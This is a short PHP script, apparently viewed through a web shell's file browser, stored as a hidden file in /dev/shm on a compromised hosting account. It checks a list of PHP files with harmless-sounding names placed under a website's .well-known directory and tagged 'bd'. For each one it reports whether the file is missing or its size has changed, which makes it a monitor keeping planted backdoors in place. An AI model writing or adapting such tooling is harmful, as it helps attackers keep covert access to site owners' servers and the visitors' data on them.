Current File : //dev/shm/.ref
<?php   $r = '/home/rtpkwvwz/ecpaddlesports.com'; $x = ["/defense.php"=>"bd@@154278@@24",
"/.well-known/pki-validation/uploadPDF.php"=>"bd@@151730@@1485",
"/.well-known/user_item.php"=>"bd@@143907@@81",
"/.well-known/pki-validation/uploadPDF.php"=>"bd@@152387@@36",
"/.well-known/removeFields.php"=>"bd@@141668@@23",
"/.well-known/user_item.php"=>"bd@@142239@@1823"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');